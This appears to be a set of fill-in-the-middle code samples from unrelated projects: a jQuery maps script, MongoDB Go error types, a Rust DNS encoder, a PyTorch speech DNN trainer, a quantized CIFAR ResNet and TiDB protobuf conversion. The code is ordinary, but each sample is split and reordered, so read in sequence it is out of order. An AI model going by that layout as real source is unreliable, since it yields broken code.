google.maps.Geocoder,e.geocode({address:t.replace("[nomarker]","")},function(t,e){e==google.maps.GeocoderStatus.OK&&(s=new google.maps.Marker({map:a,icon:i,title:p,position:t[0].geometry.location,optimised:!1}))}))})}else console.log("There was a problem geocoding the address.")}):void 0!=d&&""!=d&&0!=d&&void 0!=c&&""!=c&&0!=c&&(g.center={lat:d,lng:c},e=new google.maps.Map(n,g),a=new google.maps.Marker({position:{lat:d,lng:c},map:e,icon:i,title:p}))})},initGoogleMaps(),t.extend(t.easing,{easeInCubic:function(t){return t*t*t}})}(jQuery); | ||
errors.go | // Copyright (C) MongoDB, Inc. 2017-present.
//
// Licensed under the Apache License, Version 2.0 (the "License"); you may
// not use this file except in compliance with the License. You may obtain
// a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
package mongo
import (
"bytes"
"errors"
"fmt"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/x/mongo/driver"
"go.mongodb.org/mongo-driver/x/mongo/driver/topology"
"go.mongodb.org/mongo-driver/x/network/command"
"go.mongodb.org/mongo-driver/x/network/result"
)
// ErrUnacknowledgedWrite is returned from functions that have an unacknowledged
// write concern.
var ErrUnacknowledgedWrite = errors.New("unacknowledged write")
// ErrClientDisconnected is returned when a user attempts to call a method on a
// disconnected client
var ErrClientDisconnected = errors.New("client is disconnected")
// ErrNilDocument is returned when a user attempts to pass a nil document or filter
// to a function where the field is required.
var ErrNilDocument = errors.New("document is nil")
// ErrEmptySlice is returned when a user attempts to pass an empty slice as input
// to a function wehere the field is required.
var ErrEmptySlice = errors.New("must provide at least one element in input slice")
func replaceErrors(err error) error |
// CommandError represents an error in execution of a command against the database.
type CommandError struct {
Code int32
Message string
Labels []string
Name string
}
// Error implements the error interface.
func (e CommandError) Error() string {
if e.Name != "" {
return fmt.Sprintf("(%v) %v", e.Name, e.Message)
}
return e.Message
}
// HasErrorLabel returns true if the error contains the specified label.
func (e CommandError) HasErrorLabel(label string) bool {
if e.Labels != nil {
for _, l := range e.Labels {
if l == label {
return true
}
}
}
return false
}
// WriteError is a non-write concern failure that occurred as a result of a write
// operation.
type WriteError struct {
Index int
Code int
Message string
}
func (we WriteError) Error() string { return we.Message }
// WriteErrors is a group of non-write concern failures that occurred as a result
// of a write operation.
type WriteErrors []WriteError
func (we WriteErrors) Error() string {
var buf bytes.Buffer
fmt.Fprint(&buf, "write errors: [")
for idx, err := range we {
if idx != 0 {
fmt.Fprintf(&buf, ", ")
}
fmt.Fprintf(&buf, "{%s}", err)
}
fmt.Fprint(&buf, "]")
return buf.String()
}
func writeErrorsFromResult(rwes []result.WriteError) WriteErrors {
wes := make(WriteErrors, 0, len(rwes))
for _, err := range rwes {
wes = append(wes, WriteError{Index: err.Index, Code: err.Code, Message: err.ErrMsg})
}
return wes
}
// WriteConcernError is a write concern failure that occurred as a result of a
// write operation.
type WriteConcernError struct {
Code int
Message string
Details bson.Raw
}
func (wce WriteConcernError) Error() string { return wce.Message }
// WriteException is an error for a non-bulk write operation.
type WriteException struct {
WriteConcernError *WriteConcernError
WriteErrors WriteErrors
}
func (mwe WriteException) Error() string {
var buf bytes.Buffer
fmt.Fprint(&buf, "multiple write errors: [")
fmt.Fprintf(&buf, "{%s}, ", mwe.WriteErrors)
fmt.Fprintf(&buf, "{%s}]", mwe.WriteConcernError)
return buf.String()
}
func convertBulkWriteErrors(errors []driver.BulkWriteError) []BulkWriteError {
bwErrors := make([]BulkWriteError, 0, len(errors))
for _, err := range errors {
bwErrors = append(bwErrors, BulkWriteError{
WriteError{
Index: err.Index,
Code: err.Code,
Message: err.ErrMsg,
},
dispatchToMongoModel(err.Model),
})
}
return bwErrors
}
func convertWriteConcernError(wce *result.WriteConcernError) *WriteConcernError {
if wce == nil {
return nil
}
return &WriteConcernError{Code: wce.Code, Message: wce.ErrMsg, Details: wce.ErrInfo}
}
// BulkWriteError is an error for one operation in a bulk write.
type BulkWriteError struct {
WriteError
Request WriteModel
}
func (bwe BulkWriteError) Error() string {
var buf bytes.Buffer
fmt.Fprintf(&buf, "{%s}", bwe.WriteError)
return buf.String()
}
// BulkWriteException is an error for a bulk write operation.
type BulkWriteException struct {
WriteConcernError *WriteConcernError
WriteErrors []BulkWriteError
}
func (bwe BulkWriteException) Error() string {
var buf bytes.Buffer
fmt.Fprint(&buf, "bulk write error: [")
fmt.Fprintf(&buf, "{%s}, ", bwe.WriteErrors)
fmt.Fprintf(&buf, "{%s}]", bwe.WriteConcernError)
return buf.String()
}
// returnResult is used to determine if a function calling processWriteError should return
// the result or return nil. Since the processWriteError function is used by many different
// methods, both *One and *Many, we need a way to differentiate if the method should return
// the result and the error.
type returnResult int
const (
rrNone returnResult = 1 << iota // None means do not return the result ever.
rrOne // One means return the result if this was called by a *One method.
rrMany // Many means return the result is this was called by a *Many method.
rrAll returnResult = rrOne | rrMany // All means always return the result.
)
// processWriteError handles processing the result of a write operation. If the retrunResult matches
// the calling method's type, it should return the result object in addition to the error.
// This function will wrap the errors from other packages and return them as errors from this package.
//
// WriteConcernError will be returned over WriteErrors if both are present.
func processWriteError(wce *result.WriteConcernError, wes []result.WriteError, err error) (returnResult, error) {
switch {
case err == command.ErrUnacknowledgedWrite:
return rrAll, ErrUnacknowledgedWrite
case err != nil:
return rrNone, replaceErrors(err)
case wce != nil || len(wes) > 0:
return rrMany, WriteException{
WriteConcernError: convertWriteConcernError(wce),
WriteErrors: writeErrorsFromResult(wes),
}
default:
return rrAll, nil
}
}
| {
if err == topology.ErrTopologyClosed {
return ErrClientDisconnected
}
if ce, ok := err.(command.Error); ok {
return CommandError{Code: ce.Code, Message: ce.Message, Labels: ce.Labels, Name: ce.Name}
}
return err
} |
dns.rs | use crate::encode::Encoder;
use crate::{Dns, EncodeResult, Flags};
impl Encoder {
pub(super) fn flags(&mut self, flags: &Flags) {
let mut buffer = 0u8;
if flags.qr {
buffer |= 0b1000_0000;
}
let opcode = flags.opcode.clone() as u8;
buffer |= opcode << 3;
if flags.aa {
buffer |= 0b0000_0100;
}
if flags.tc {
buffer |= 0b0000_0010;
}
if flags.rd {
buffer |= 0b0000_0001;
}
self.u8(buffer);
let mut buffer = 0u8;
if flags.ra {
buffer |= 0b1000_0000;
}
if flags.ad {
buffer |= 0b0010_0000;
}
if flags.cd {
buffer |= 0b0001_0000;
}
let rcode = flags.rcode.clone() as u8;
buffer |= rcode;
self.u8(buffer);
}
pub(super) fn | (&mut self, dns: &Dns) -> EncodeResult<()> {
self.u16(dns.id);
self.flags(&dns.flags);
self.u16(dns.questions.len() as u16);
self.u16(dns.answers.len() as u16);
self.u16(dns.authorities.len() as u16);
self.u16(dns.additionals.len() as u16);
for question in &dns.questions {
self.question(question)?;
}
for answer in &dns.answers {
self.rr(answer)?;
}
for authority in &dns.authorities {
self.rr(authority)?;
}
for additional in &dns.additionals {
self.rr(additional)?;
}
Ok(())
}
}
impl_encode_without_result!(Flags, flags);
impl_encode!(Dns, dns);
| dns |
02_train_dnn.py | # -*- coding: utf-8 -*-
#
# DNNを学習します.
#
# Pytorchを用いた処理に必要なモジュールをインポート
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from torch import optim
# 作成したDatasetクラスをインポート
from my_dataset import SequenceDataset
# 数値演算用モジュール(numpy)をインポート
import numpy as np
# プロット用モジュール(matplotlib)をインポート
import matplotlib.pyplot as plt
# hmmfunc.pyからMonoPhoneHMMクラスをインポート
from hmmfunc import MonoPhoneHMM
# モデルの定義をインポート
from my_model import MyDNN
# json形式の入出力を行うモジュールをインポート
import json
# os, sys, shutilモジュールをインポート
import os
import sys
import shutil
#
# メイン関数
#
if __name__ == "__main__":
#
# 設定ここから
#
# 訓練データの特徴量リスト
train_feat_scp = \
'../01compute_features/mfcc/train_small/feats.scp'
# 訓練データのラベル(アライメント)ファイル
train_label_file = \
'./exp/data/train_small/alignment'
# 訓練データから計算された
# 特徴量の平均/標準偏差ファイル
mean_std_file = \
'../01compute_features/mfcc/train_small/mean_std.txt'
# 開発データの特徴量リスト
dev_feat_scp = \
'../01compute_features/mfcc/dev/feats.scp'
# 開発データのラベル(アライメント)ファイル
dev_label_file = \
'./exp/data/dev/alignment'
# HMMファイル
# HMMファイルは音素数と状態数の
# 情報を得るためだけに使う
hmm_file = '../03gmm_hmm/exp/model_3state_2mix/10.hmm'
# 学習結果を出力するディレクトリ
output_dir = os.path.join('exp', 'model_dnn')
# ミニバッチに含める発話数
batch_size = 5
# 最大エポック数
max_num_epoch = 60
# 中間層のレイヤー数
num_layers = 4
# 中間層の次元数
hidden_dim = 1024
# splice: 前後 n フレームの特徴量を結合する
# 次元数は(splice*2+1)倍になる
splice = 5
# 初期学習率
initial_learning_rate = 0.008
# 学習率の減衰やEarly stoppingの
# 判定を開始するエポック数
# (= 最低限このエポックまではどれだけ
# validation結果が悪くても学習を続ける)
lr_decay_start_epoch = 7
# 学習率を減衰する割合
# (減衰後学習率 <- 現在の学習率*lr_decay_factor)
# 1.0以上なら,減衰させない
lr_decay_factor = 0.5
# Early stoppingの閾値
# 最低損失値を更新しない場合が
# 何エポック続けば学習を打ち切るか
early_stop_threshold = 3
#
# 設定ここまで
#
# 出力ディレクトリが存在しない場合は作成する
os.makedirs(output_dir, exist_ok=True)
# 設定を辞書形式にする
config = {'num_layers': num_layers,
'hidden_dim': hidden_dim,
'splice': splice,
'batch_size': batch_size,
'max_num_epoch': max_num_epoch,
'initial_learning_rate': initial_learning_rate,
'lr_decay_start_epoch': lr_decay_start_epoch,
'lr_decay_factor': lr_decay_factor,
'early_stop_threshold': early_stop_threshold}
# 設定をJSON形式で保存する
conf_file = os.path.join(output_dir, 'config.json')
with open(conf_file, mode='w') as f:
json.dump(config, f, indent=4)
# 特徴量の平均/標準偏差ファイルを読み込む
with open(mean_std_file, mode='r') as f:
# 全行読み込み
lines = f.readlines()
# 1行目(0始まり)が平均値ベクトル(mean),
# 3行目が標準偏差ベクトル(std)
mean_line = lines[1]
std_line = lines[3]
# スペース区切りのリストに変換
feat_mean = mean_line.split()
feat_std = std_line.split()
# numpy arrayに変換
feat_mean = np.array(feat_mean,
dtype=np.float32)
feat_std = np.array(feat_std,
dtype=np.float32)
# 平均/標準偏差ファイルをコピーする
shutil.copyfile(mean_std_file,
os.path.join(output_dir, 'mean_std.txt'))
# 次元数の情報を得る
feat_dim = np.size(feat_mean)
# DNNの出力層の次元数を得るために,
# HMMの音素数と状態数を得る
# MonoPhoneHMMクラスを呼び出す
hmm = MonoPhoneHMM()
# HMMを読み込む
hmm.load_hmm(hmm_file)
# DNNの出力層の次元数は音素数x状態数
dim_out = hmm.num_phones * hmm.num_states
# バッチデータ作成の際にラベルを埋める値
# はdim_out以上の値にする
pad_index = dim_out
# ニューラルネットワークモデルを作成する
# 入力特徴量の次元数は
# feat_dim * (2*splice+1)
dim_in = feat_dim * (2*splice+1)
model = MyDNN(dim_in=dim_in,
dim_hidden=hidden_dim,
dim_out=dim_out,
num_layers=num_layers)
print(model)
# オプティマイザを定義
# ここでは momentum stochastic gradient descent
# を使用
optimizer = optim.SGD(model.parameters(),
lr=initial_learning_rate,
momentum=0.99)
# 訓練データのデータセットを作成する
# padding_indexはdim_out以上の値に設定する
train_dataset = SequenceDataset(train_feat_scp,
train_label_file,
feat_mean,
feat_std,
pad_index,
splice)
# 開発データのデータセットを作成する
dev_dataset = SequenceDataset(dev_feat_scp,
dev_label_file,
feat_mean,
feat_std,
pad_index,
splice)
# 訓練データのDataLoaderを呼び出す
# 訓練データはシャッフルして用いる
# (num_workerは大きい程処理が速くなりますが,
# PCに負担が出ます.PCのスペックに応じて
# 設定してください)
train_loader = DataLoader(train_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=4)
# 開発データのDataLoaderを呼び出す
# 開発データはデータはシャッフルしない
dev_loader = DataLoader(dev_dataset,
batch_size=batch_size,
shuffle=False,
num_workers=4)
# クロスエントロピーを損失関数として用いる
criterion = \
nn.CrossEntropyLoss(ignore_index=pad_index)
# CUDAが使える場合はモデルパラメータをGPUに,
# そうでなければCPUに配置する
if torch.cuda.is_available():
device = torch.device('cuda')
else:
device = torch.device('cpu')
model = model.to(device)
# モデルをトレーニングモードに設定する
model.train()
# 訓練データの処理と開発データの処理を
# for でシンプルに記述するために,辞書データ化しておく
dataset_loader = {'train': train_loader,
'validation': dev_loader}
# 各エポックにおける損失値と誤り率の履歴
loss_history = {'train': [],
'validation': []}
error_history = {'train': [],
'validation': []}
# 本プログラムでは,validation時の損失値が
# 最も低かったモデルを保存する.
# そのため,最も低い損失値,
# そのときのモデルとエポック数を記憶しておく
best_loss = -1
best_model = None
best_epoch = 0
# Early stoppingフラグ.Trueになると学習を打ち切る
early_stop_flag = False
# Early stopping判定用(損失値の最低値が
# 更新されないエポックが何回続いているか)のカウンタ
counter_for_early_stop = 0
# ログファイルの準備
log_file = open(os.path.join(output_dir,
'log.txt'),
mode='w')
log_file.write('epoch\ttrain loss\t'\
'train err\tvalid loss\tvalid err')
# エポックの数だけループ
for epoch in range(max_num_epoch):
# early stopフラグが立っている場合は,
# 学習を打ち切る
if early_stop_flag:
print(' Early stopping.'\
' (early_stop_threshold = %d)' \
% (early_stop_threshold))
log_file.write('\n Early stopping.'\
' (early_stop_threshold = %d)' \
% (early_stop_threshold))
break
# エポック数を表示
print('epoch %d/%d:' % (epoch+1, max_num_epoch))
log_file.write('\n%d\t' % (epoch+1))
# trainフェーズとvalidationフェーズを交互に実施する
for phase in ['train', 'validation']:
# このエポックにおける累積損失値と発話数
total_loss = 0
total_utt = 0
# このエポックにおける累積認識誤り文字数と総文字数
total_error = 0
total_frames = 0
# 各フェーズのDataLoaderから1ミニバッチ
# ずつ取り出して処理する.
# これを全ミニバッチ処理が終わるまで繰り返す.
# ミニバッチに含まれるデータは,
# 音声特徴量,ラベル,フレーム数,
# ラベル長,発話ID
for (features, labels, feat_len,
label_len, utt_ids) \
in dataset_loader[phase]:
# CUDAが使える場合はデータをGPUに,
# そうでなければCPUに配置する
features, labels = \
features.to(device), labels.to(device)
# 勾配をリセット
optimizer.zero_grad()
# モデルの出力を計算(フォワード処理)
outputs = model(features)
# この時点でoutputsは
# [バッチサイズ, フレーム数, ラベル数]
# の3次元テンソル.
# CrossEntropyLossを使うためには
# [サンプル数, ラベル数]の2次元テンソル
# にする必要があるので,viewを使って
# 変形する
b_size, f_size, _ = outputs.size()
outputs = outputs.view(b_size * f_size,
dim_out)
# labelsは[バッチサイズ, フレーム]の
# 2次元テンソル.
# CrossEntropyLossを使うためには
# [サンプル数]の1次元テンソルにする
# 必要があるので.viewを使って変形する.
# 1次元への変形はview(-1)で良い.
# (view(b_size*f_size)でも良い)
labels = labels.view(-1)
# 損失値を計算する.
loss = criterion(outputs, labels)
# 訓練フェーズの場合は,
# 誤差逆伝搬を実行し,
# モデルパラメータを更新する
if phase == 'train':
# 勾配を計算する
loss.backward()
# オプティマイザにより,
# パラメータを更新する
optimizer.step()
# 損失値を累積する
total_loss += loss.item()
# 処理した発話数をカウントする
total_utt += b_size
#
# フレーム単位の誤り率を計算する
#
# 推定ラベルを得る
_, hyp = torch.max(outputs, 1)
# ラベルにpad_indexを埋めた
# フレームを取り除く
hyp = hyp[labels != pad_index]
ref = labels[labels != pad_index]
# 推定ラベルと正解ラベルが不一致な
# フレーム数を得る
error = (hyp != ref).sum()
# 誤りフレーム数を累積する
total_error += error
# 総フレーム数を累積する
total_frames += len(ref) | #
# 損失値の累積値を,処理した発話数で割る
epoch_loss = total_loss / total_utt
# 画面とログファイルに出力する
print(' %s loss: %f' \
% (phase, epoch_loss))
log_file.write('%.6f\t' % (epoch_loss))
# 履歴に加える
loss_history[phase].append(epoch_loss)
# 総誤りフレーム数を,総フレーム数で
# 割ってエラー率に換算
epoch_error = 100.0 * total_error \
/ total_frames
# 画面とログファイルに出力する
print(' %s error rate: %f %%' \
% (phase, epoch_error))
log_file.write('%.6f\t' % (epoch_error))
# 履歴に加える
error_history[phase].append(epoch_error)
#
# validationフェーズ特有の処理
#
if phase == 'validation':
if epoch == 0 or best_loss > epoch_loss:
# 損失値が最低値を更新した場合は,
# その時のモデルを保存する
best_loss = epoch_loss
torch.save(model.state_dict(),
output_dir+'/best_model.pt')
best_epoch = epoch
# Early stopping判定用の
# カウンタをリセットする
counter_for_early_stop = 0
else:
# 最低値を更新しておらず,
if epoch+1 >= lr_decay_start_epoch:
# かつlr_decay_start_epoch以上の
# エポックに達している場合
if counter_for_early_stop+1 \
>= early_stop_threshold:
# 更新していないエポックが,
# 閾値回数以上続いている場合,
# Early stopping フラグを立てる
early_stop_flag = True
else:
# Early stopping条件に
# 達していない場合は
# 学習率を減衰させて学習続行
if lr_decay_factor < 1.0:
for i, param_group \
in enumerate(\
optimizer.param_groups):
if i == 0:
lr = param_group['lr']
dlr = lr_decay_factor \
* lr
print(' (Decay '\
'learning rate:'\
' %f -> %f)' \
% (lr, dlr))
log_file.write(\
'(Decay learning'\
' rate: %f -> %f)'\
% (lr, dlr))
param_group['lr'] = dlr
# Early stopping判定用の
# カウンタを増やす
counter_for_early_stop += 1
#
# 全エポック終了
# 学習済みモデルの保存とログの書き込みを行う
#
print('---------------Summary'\
'------------------')
log_file.write('\n---------------Summary'\
'------------------\n')
# 最終エポックのモデルを保存する
torch.save(model.state_dict(),
os.path.join(output_dir,'final_model.pt'))
print('Final epoch model -> %s/final_model.pt' \
% (output_dir))
log_file.write('Final epoch model ->'\
' %s/final_model.pt\n' \
% (output_dir))
# 最終エポックの情報
for phase in ['train', 'validation']:
# 最終エポックの損失値を出力
print(' %s loss: %f' \
% (phase, loss_history[phase][-1]))
log_file.write(' %s loss: %f\n' \
% (phase, loss_history[phase][-1]))
# 最終エポックのエラー率を出力
print(' %s error rate: %f %%' \
% (phase, error_history[phase][-1]))
log_file.write(' %s error rate: %f %%\n' \
% (phase, error_history[phase][-1]))
# ベストエポックの情報
# (validationの損失が最小だったエポック)
print('Best epoch model (%d-th epoch)'\
' -> %s/best_model.pt' \
% (best_epoch+1, output_dir))
log_file.write('Best epoch model (%d-th epoch)'\
' -> %s/best_model.pt\n' \
% (best_epoch+1, output_dir))
for phase in ['train', 'validation']:
# ベストエポックの損失値を出力
print(' %s loss: %f' \
% (phase, loss_history[phase][best_epoch]))
log_file.write(' %s loss: %f\n' \
% (phase, loss_history[phase][best_epoch]))
# ベストエポックのエラー率を出力
print(' %s error rate: %f %%' \
% (phase, error_history[phase][best_epoch]))
log_file.write(' %s error rate: %f %%\n' \
% (phase, error_history[phase][best_epoch]))
# 損失値の履歴(Learning Curve)グラフにして保存する
fig1 = plt.figure()
for phase in ['train', 'validation']:
plt.plot(loss_history[phase],
label=phase+' loss')
plt.xlabel('Epoch')
plt.ylabel('Loss')
fig1.legend()
fig1.savefig(output_dir+'/loss.png')
# 認識誤り率の履歴グラフにして保存する
fig2 = plt.figure()
for phase in ['train', 'validation']:
plt.plot(error_history[phase],
label=phase+' error')
plt.xlabel('Epoch')
plt.ylabel('Error [%]')
fig2.legend()
fig2.savefig(output_dir+'/error.png')
# ログファイルを閉じる
log_file.close() |
#
# このフェーズにおいて,1エポック終了
# 損失値,認識エラー率,モデルの保存等を行う |
resnet_cifar_quant.py | """
ResNet on CIFAR10
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import init
from .quant import ClippedReLU, int_conv2d, int_linear
from .mpdr_score import get_mpdr_score
import math
class DownsampleA(nn.Module):
def __init__(self, nIn, nOut, stride):
super(DownsampleA, self).__init__()
assert stride == 2
self.avg = nn.AvgPool2d(kernel_size=1, stride=stride)
def forward(self, x):
x = self.avg(x)
return torch.cat((x, x.mul(0)), 1)
class ResNetBasicblock(nn.Module):
expansion = 1
"""
RexNet basicblock (https://github.com/facebook/fb.resnet.torch/blob/master/models/resnet.lua)
"""
def __init__(self, inplanes, planes, stride=1, downsample=None, wbit=4, abit=4, alpha_init=10, mode='mean', k=2, ch_group=16, push=False):
super(ResNetBasicblock, self).__init__()
# self.conv_a = nn.Conv2d(inplanes, planes, kernel_size=3, stride=stride, padding=1, bias=False) # quantization
self.conv_a = int_conv2d(inplanes, planes, kernel_size=3, stride=stride, padding=1, bias=False, nbit=wbit, mode=mode, k=k, ch_group=ch_group, push=push) # quantization
self.bn_a = nn.BatchNorm2d(planes)
self.relu1 = ClippedReLU(num_bits=abit, alpha=alpha_init, inplace=True) # Clipped ReLU function 4 - bits
# self.relu1 = nn.ReLU(inplace=True)
self.conv_b = int_conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False, nbit=wbit, mode=mode, k=k, ch_group=ch_group, push=push) # quantization
# self.conv_b = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False) # quantization
self.bn_b = nn.BatchNorm2d(planes)
self.relu2 = ClippedReLU(num_bits=abit, alpha=alpha_init, inplace=True) # Clipped ReLU function 4 - bits
self.downsample = downsample
def forward(self, x):
residual = x
basicblock = self.conv_a(x)
basicblock = self.bn_a(basicblock)
basicblock = self.relu1(basicblock)
basicblock = self.conv_b(basicblock)
basicblock = self.bn_b(basicblock)
if self.downsample is not None:
residual = self.downsample(x)
return self.relu2(residual + basicblock)
class CifarResNet(nn.Module):
"""
ResNet optimized for the Cifar dataset, as specified in
https://arxiv.org/abs/1512.03385.pdf
"""
def __init__(self, depth, num_classes, wbit=4, abit=4, alpha_init=10, mode='mean', k=2, ch_group=16, push=False):
""" Constructor
Args:
depth: number of layers.
num_classes: number of classes
base_width: base width
"""
super(CifarResNet, self).__init__()
block = ResNetBasicblock
#Model type specifies number of layers for CIFAR-10 and CIFAR-100 model
assert (depth - 2) % 6 == 0, 'depth should be one of 20, 32, 44, 56, 110'
layer_blocks = (depth - 2) // 6
print ('CifarResNet : Depth : {} , Layers for each block : {}'.format(depth, layer_blocks))
self.num_classes = num_classes
self.ch_group = ch_group
# self.conv_1_3x3 = nn.Conv2d(3, 16, kernel_size=3, stride=1, padding=1, bias=False)
self.conv_1_3x3 = int_conv2d(3, 16, kernel_size=3, stride=1, padding=1, bias=False, nbit=wbit, mode=mode, k=k, ch_group=ch_group, push=False) # skip the push process for the first conv layer
self.relu0 = ClippedReLU(num_bits=abit, alpha=alpha_init, inplace=True)
self.bn_1 = nn.BatchNorm2d(16)
self.inplanes = 16
self.stage_1 = self._make_layer(block, 16, layer_blocks, 1, wbit=wbit, abit=abit, alpha_init=alpha_init, mode=mode, k=k, ch_group=ch_group, push=push)
self.stage_2 = self._make_layer(block, 32, layer_blocks, 2, wbit=wbit, abit=abit, alpha_init=alpha_init, mode=mode, k=k, ch_group=ch_group, push=push)
self.stage_3 = self._make_layer(block, 64, layer_blocks, 2, wbit=wbit, abit=abit, alpha_init=alpha_init, mode=mode, k=k, ch_group=ch_group, push=push)
self.avgpool = nn.AvgPool2d(8)
self.classifier = int_linear(64*block.expansion, num_classes, nbit=wbit, mode=mode, k=k, ch_group=ch_group, push=False) # skip the push process for the last fc layer
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
#m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
init.kaiming_normal_(m.weight)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1, wbit=4, abit=4, alpha_init=10, mode='mean', k=2, ch_group=16, push=False):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
int_conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False, nbit=wbit, mode=mode, k=k, ch_group=ch_group, push=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, wbit=wbit, abit=abit, alpha_init=alpha_init, mode=mode, k=k, ch_group=ch_group, push=push))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, wbit=wbit, abit=abit, alpha_init=alpha_init, mode=mode, k=k, ch_group=ch_group, push=push))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv_1_3x3(x)
x = self.relu0(self.bn_1(x))
x = self.stage_1(x)
x = self.stage_2(x)
x = self.stage_3(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
return self.classifier(x) | def get_group_val(self):
val = torch.Tensor()
if torch.cuda.is_available():
val = val.cuda()
count = 0
for m in self.modules():
if isinstance(m, int_conv2d):
kw = m.weight.size(2)
if kw != 1:
if not count in [0]:
w_l = m.weight
num_group = w_l.size(0) * w_l.size(1) // self.ch_group
w_l = w_l.view(w_l.size(0), w_l.size(1) // self.ch_group, self.ch_group, kw, kw)
w_l = w_l.contiguous().view((num_group, self.ch_group*kw*kw))
g = w_l.pow(2).sum(dim=1).pow(1/2)
val = torch.cat((val.view(-1), g.view(-1)))
count += 1
return val
def get_global_thre(self, ratio):
grp_val = self.get_group_val()
# grp_mean = grp_val.mean()
# threshold = ratio * grp_mean
sorted_block_values, indices = torch.sort(grp_val.contiguous().view(-1))
thre_index = int(grp_val.data.numel() * ratio)
threshold = sorted_block_values[thre_index]
return threshold
def get_group_mp(self):
val = torch.Tensor()
if torch.cuda.is_available():
val = val.cuda()
count = 0
for m in self.modules():
if isinstance(m, int_conv2d):
kw = m.weight.size(2)
if kw != 1:
if not count in [0]:
w_l = m.weight
num_group = w_l.size(0) * w_l.size(1) // self.ch_group
w_l = w_l.view(w_l.size(0), w_l.size(1) // self.ch_group, self.ch_group, kw, kw)
w_l = w_l.contiguous().view((num_group, self.ch_group*kw*kw))
g = w_l.abs().mean(dim=1)
val = torch.cat((val.view(-1), g.view(-1)))
count += 1
return val
def get_global_mp_thre(self, ratio):
grp_val = self.get_group_mp()
sorted_block_values, indices = torch.sort(grp_val.contiguous().view(-1))
thre_index = int(grp_val.data.numel() * ratio)
threshold = sorted_block_values[thre_index]
return threshold
def get_group_mpdr(self):
val = torch.Tensor()
if torch.cuda.is_available():
val = val.cuda()
count = 0
for m in self.modules():
if isinstance(m, int_conv2d):
kw = m.weight.size(2)
if kw != 1:
if not count in [0]:
w_l = get_mpdr_score(m.weight)
num_group = w_l.size(0) * w_l.size(1) // self.ch_group
w_l = w_l.view(w_l.size(0), w_l.size(1) // self.ch_group, self.ch_group, kw, kw)
w_l = w_l.contiguous().view((num_group, self.ch_group*kw*kw))
g = w_l.mean(dim=1) # compute the mean of the mpdr score
val = torch.cat((val.view(-1), g.view(-1)))
count += 1
return val
def get_global_mpdr_thre(self, ratio):
grp_val = self.get_group_mpdr()
sorted_block_values, indices = torch.sort(grp_val.contiguous().view(-1))
thre_index = int(grp_val.data.numel() * ratio)
threshold = sorted_block_values[thre_index]
return threshold
class resnet20_quant:
base=CifarResNet
args = list()
kwargs = {'depth': 20}
class resnet32_quant:
base=CifarResNet
args = list()
kwargs = {'depth': 32} | |
expr_to_pb.go | // Copyright 2016 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// See the License for the specific language governing permissions and
// limitations under the License.
package expression
import (
"github.com/ngaut/log"
"github.com/pingcap/tidb/ast"
"github.com/pingcap/tidb/kv"
"github.com/pingcap/tidb/mysql"
"github.com/pingcap/tidb/sessionctx/variable"
"github.com/pingcap/tidb/util/codec"
"github.com/pingcap/tidb/util/types"
"github.com/pingcap/tipb/go-tipb"
)
// ExpressionsToPB converts expression to tipb.Expr.
func ExpressionsToPB(sc *variable.StatementContext, exprs []Expression, client kv.Client) (pbExpr *tipb.Expr, pushed []Expression, remained []Expression) {
pc := pbConverter{client: client, sc: sc}
for _, expr := range exprs {
v := pc.exprToPB(expr)
if v == nil {
remained = append(remained, expr)
continue
}
pushed = append(pushed, expr)
if pbExpr == nil {
pbExpr = v
} else {
// Merge multiple converted pb expression into a CNF.
pbExpr = &tipb.Expr{
Tp: tipb.ExprType_And,
Children: []*tipb.Expr{pbExpr, v}}
}
}
return
}
// ExpressionsToPBList converts expressions to tipb.Expr list for new plan.
func ExpressionsToPBList(sc *variable.StatementContext, exprs []Expression, client kv.Client) (pbExpr []*tipb.Expr) {
pc := pbConverter{client: client, sc: sc}
for _, expr := range exprs {
v := pc.exprToPB(expr)
pbExpr = append(pbExpr, v)
}
return
}
type pbConverter struct {
client kv.Client
sc *variable.StatementContext
}
func (pc pbConverter) exprToPB(expr Expression) *tipb.Expr {
switch x := expr.(type) {
case *Constant:
return pc.datumToPBExpr(x.Value)
case *Column:
return pc.columnToPBExpr(x)
case *ScalarFunction:
return pc.scalarFuncToPBExpr(x)
}
return nil
}
func (pc pbConverter) datumToPBExpr(d types.Datum) *tipb.Expr {
var tp tipb.ExprType
var val []byte
switch d.Kind() {
case types.KindNull:
tp = tipb.ExprType_Null
case types.KindInt64:
tp = tipb.ExprType_Int64
val = codec.EncodeInt(nil, d.GetInt64())
case types.KindUint64:
tp = tipb.ExprType_Uint64
val = codec.EncodeUint(nil, d.GetUint64())
case types.KindString:
tp = tipb.ExprType_String
val = d.GetBytes()
case types.KindBytes:
tp = tipb.ExprType_Bytes
val = d.GetBytes()
case types.KindFloat32:
tp = tipb.ExprType_Float32
val = codec.EncodeFloat(nil, d.GetFloat64())
case types.KindFloat64:
tp = tipb.ExprType_Float64
val = codec.EncodeFloat(nil, d.GetFloat64())
case types.KindMysqlDuration:
tp = tipb.ExprType_MysqlDuration
val = codec.EncodeInt(nil, int64(d.GetMysqlDuration().Duration))
case types.KindMysqlDecimal:
tp = tipb.ExprType_MysqlDecimal
